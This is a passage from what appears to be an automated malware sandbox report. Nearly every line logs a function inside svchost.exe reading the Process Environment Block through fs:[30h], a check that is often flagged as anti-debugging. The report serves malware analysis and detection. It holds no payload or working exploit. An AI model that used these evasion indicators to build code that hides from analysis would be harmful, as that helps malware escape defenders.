Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA352 mov eax, dword ptr fs:[00000030h]	3_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD8350 mov ecx, dword ptr fs:[00000030h]	3_2_03CD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D0634F mov eax, dword ptr fs:[00000030h]	3_2_03D0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD437C mov eax, dword ptr fs:[00000030h]	3_2_03CD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]	3_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]	3_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]	3_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C310 mov ecx, dword ptr fs:[00000030h]	3_2_03C2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50310 mov ecx, dword ptr fs:[00000030h]	3_2_03C50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D062D6 mov eax, dword ptr fs:[00000030h]	3_2_03D062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]	3_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]	3_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]	3_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E284 mov eax, dword ptr fs:[00000030h]	3_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E284 mov eax, dword ptr fs:[00000030h]	3_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]	3_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]	3_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]	3_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402A0 mov eax, dword ptr fs:[00000030h]	3_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402A0 mov eax, dword ptr fs:[00000030h]	3_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB8243 mov eax, dword ptr fs:[00000030h]	3_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB8243 mov ecx, dword ptr fs:[00000030h]	3_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A250 mov eax, dword ptr fs:[00000030h]	3_2_03C2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36259 mov eax, dword ptr fs:[00000030h]	3_2_03C36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA250 mov eax, dword ptr fs:[00000030h]	3_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA250 mov eax, dword ptr fs:[00000030h]	3_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]	3_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]	3_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]	3_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2826B mov eax, dword ptr fs:[00000030h]	3_2_03C2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2823B mov eax, dword ptr fs:[00000030h]	3_2_03C2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	3_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	3_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D061E5 mov eax, dword ptr fs:[00000030h]	3_2_03D061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C601F8 mov eax, dword ptr fs:[00000030h]	3_2_03C601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C70185 mov eax, dword ptr fs:[00000030h]	3_2_03C70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEC188 mov eax, dword ptr fs:[00000030h]	3_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEC188 mov eax, dword ptr fs:[00000030h]	3_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4180 mov eax, dword ptr fs:[00000030h]	3_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4180 mov eax, dword ptr fs:[00000030h]	3_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]	3_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]	3_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]	3_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov ecx, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C156 mov eax, dword ptr fs:[00000030h]	3_2_03C2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC8158 mov eax, dword ptr fs:[00000030h]	3_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36154 mov eax, dword ptr fs:[00000030h]	3_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36154 mov eax, dword ptr fs:[00000030h]	3_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04164 mov eax, dword ptr fs:[00000030h]	3_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04164 mov eax, dword ptr fs:[00000030h]	3_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov ecx, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF0115 mov eax, dword ptr fs:[00000030h]	3_2_03CF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C60124 mov eax, dword ptr fs:[00000030h]	3_2_03C60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB20DE mov eax, dword ptr fs:[00000030h]	3_2_03CB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_03C2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C380E9 mov eax, dword ptr fs:[00000030h]	3_2_03C380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB60E0 mov eax, dword ptr fs:[00000030h]	3_2_03CB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]	3_2_03C2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C720F0 mov ecx, dword ptr fs:[00000030h]	3_2_03C720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3208A mov eax, dword ptr fs:[00000030h]	3_2_03C3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C280A0 mov eax, dword ptr fs:[00000030h]	3_2_03C280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC80A8 mov eax, dword ptr fs:[00000030h]	3_2_03CC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF60B8 mov eax, dword ptr fs:[00000030h]	3_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]	3_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32050 mov eax, dword ptr fs:[00000030h]	3_2_03C32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6050 mov eax, dword ptr fs:[00000030h]	3_2_03CB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5C073 mov eax, dword ptr fs:[00000030h]	3_2_03C5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB4000 mov ecx, dword ptr fs:[00000030h]	3_2_03CB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E016 mov eax, dword ptr fs:[00000030h]	3_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A020 mov eax, dword ptr fs:[00000030h]	3_2_03C2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C020 mov eax, dword ptr fs:[00000030h]	3_2_03C2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6030 mov eax, dword ptr fs:[00000030h]	3_2_03CC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB07C3 mov eax, dword ptr fs:[00000030h]	3_2_03CB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]	3_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]	3_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C527ED mov eax, dword ptr fs:[00000030h]	3_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]	3_2_03CBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C347FB mov eax, dword ptr fs:[00000030h]	3_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C347FB mov eax, dword ptr fs:[00000030h]	3_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD678E mov eax, dword ptr fs:[00000030h]	3_2_03CD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C307AF mov eax, dword ptr fs:[00000030h]	3_2_03C307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE47A0 mov eax, dword ptr fs:[00000030h]	3_2_03CE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6674D mov esi, dword ptr fs:[00000030h]	3_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6674D mov eax, dword ptr fs:[00000030h]	3_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6674D mov eax, dword ptr fs:[00000030h]	3_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30750 mov eax, dword ptr fs:[00000030h]	3_2_03C30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE75D mov eax, dword ptr fs:[00000030h]	3_2_03CBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72750 mov eax, dword ptr fs:[00000030h]	3_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72750 mov eax, dword ptr fs:[00000030h]	3_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB4755 mov eax, dword ptr fs:[00000030h]	3_2_03CB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38770 mov eax, dword ptr fs:[00000030h]	3_2_03C38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770 mov eax, dword ptr fs:[00000030h]	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C700 mov eax, dword ptr fs:[00000030h]	3_2_03C6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30710 mov eax, dword ptr fs:[00000030h]	3_2_03C30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C60710 mov eax, dword ptr fs:[00000030h]	3_2_03C60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C720 mov eax, dword ptr fs:[00000030h]	3_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C720 mov eax, dword ptr fs:[00000030h]	3_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6273C mov eax, dword ptr fs:[00000030h]	3_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6273C mov ecx, dword ptr fs:[00000030h]	3_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6273C mov eax, dword ptr fs:[00000030h]	3_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAC730 mov eax, dword ptr fs:[00000030h]	3_2_03CAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]	3_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]	3_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	3_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	3_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	3_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34690 mov eax, dword ptr fs:[00000030h]	3_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34690 mov eax, dword ptr fs:[00000030h]	3_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]	3_2_03C6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C666B0 mov eax, dword ptr fs:[00000030h]	3_2_03C666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4C640 mov eax, dword ptr fs:[00000030h]	3_2_03C4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF866E mov eax, dword ptr fs:[00000030h]	3_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF866E mov eax, dword ptr fs:[00000030h]	3_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A660 mov eax, dword ptr fs:[00000030h]	3_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A660 mov eax, dword ptr fs:[00000030h]	3_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C62674 mov eax, dword ptr fs:[00000030h]	3_2_03C62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE609 mov eax, dword ptr fs:[00000030h]	3_2_03CAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4260B mov eax, dword ptr fs:[00000030h]	3_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72619 mov eax, dword ptr fs:[00000030h]	3_2_03C72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E627 mov eax, dword ptr fs:[00000030h]	3_2_03C4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C66620 mov eax, dword ptr fs:[00000030h]	3_2_03C66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68620 mov eax, dword ptr fs:[00000030h]	3_2_03C68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3262C mov eax, dword ptr fs:[00000030h]	3_2_03C3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	3_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	3_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C365D0 mov eax, dword ptr fs:[00000030h]	3_2_03C365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	3_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	3_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
